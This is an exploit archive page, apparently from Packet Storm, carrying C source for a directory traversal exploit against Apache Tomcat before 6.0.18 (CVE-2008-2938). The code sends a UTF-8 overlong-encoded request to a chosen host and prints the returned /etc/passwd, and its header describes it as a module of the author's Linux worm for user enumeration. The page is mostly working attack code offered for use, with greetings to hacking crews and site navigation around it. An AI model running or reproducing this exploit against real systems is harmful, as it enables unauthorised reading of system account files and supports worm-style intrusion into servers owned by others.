exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apache Tomcat UTF-8 Directory Traversal

Apache Tomcat UTF-8 Directory Traversal
Posted Jul 28, 2010
Authored by Simon Ryeo, mywisdom

UTF-8 directory traversal /etc/passwd grabbing exploit for Apache Tomcat versions prior to 6.0.18.

tags | exploit, file inclusion
advisories | CVE-2008-2938
SHA-256 | 976e244165fc9beb273d4e21c954c5135843e2b1fb28d129213c11847fd97471

Apache Tomcat UTF-8 Directory Traversal

Change Mirror Download
/*Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit
c0d3r: mywisdom
thanks for not being lame to change exploit author
tis is one of my linux w0rm module for user enumerations, i've dual os worm
thanks to: gunslinger,flyf666,petimati,kiddies,xtr0nic,c0mrade,n0te,v3n0m,iblis muda,cr4wl3r
thanks to: isa m said, whitecyber
thanks to all devilzc0de crews and members, all jasakom crews and members
* EDB-ID: 6229
* CVE: 2008-2938
* OSVDB-ID: 47464
* Author: Simon Ryeo
* Published: 2008-08-11
* Verified: Verified
greetz to inj3ct0r crews:
31337 Inj3ct0r Members:

cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,

Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r?, etc..
not so good but worth to try if our target directory structure has /usr/local/wwwroot

*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define EXPLOIT "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.0\n\n"
#define RCVBUFSIZE 9999
#define tester "root:x"
void cls()
{
char esc = 27;
printf("%c%s",esc,"[2J");
printf("%c%s",esc,"[1;1H");
}
int main(int argc,char **argv)
{
if(argc<2)
{
/**checking argument to avoid memory wasting for useless variables in vma**/
cls();
printf("\nApache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit\n");
printf("\nc0d3r: mywisdom\n");
printf("\nusage:./tomcatevil hotname\n");
exit(1);
}
else
{

int port=80;
char echobuf[RCVBUFSIZE];
int rval,sockfd, bytesrcv, totalbytes;
struct hostent *he;
struct sockaddr_in their_addr;
if((he=gethostbyname(argv[1])) == NULL)
{
perror("\nSorry please recheck your target hostname !\n");
exit(1);
}
else
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket()");
exit(1);
}
else
{
//exploiting and try to get /etc/passwd
their_addr.sin_family = AF_INET;

printf("\n[-]Checking whether port %d opens or not\n",port);
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("failed to connect !!!");

}
else
{
printf("\n[+]Port 80 opens !!! now sending your exploit to our target\n");
if(send(sockfd, EXPLOIT,999,0)==-1)
{
perror ("send");
}
else
{
totalbytes=0;
while (totalbytes < RCVBUFSIZE)
{

if ((bytesrcv = recv(sockfd, echobuf, RCVBUFSIZE - 1, 0)) <= 0)
{

}
else
{
totalbytes += bytesrcv;
echobuf[bytesrcv] = '\0';

}
totalbytes++;
}


}

if(echobuf)
{

rval=strstr (echobuf, tester);
if(rval)
{
printf(echobuf);
printf("\n[+]w00t!!! target vulnerable! exploitation success u may see /etc/passwd above !!!\n");
exit(1);
}
else
{
printf(echobuf);
printf("\n[-]target not vulnerable !!!\n");
exit(1);
}
}

}
close(sockfd);



//eof exploiting

}
}

}


}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close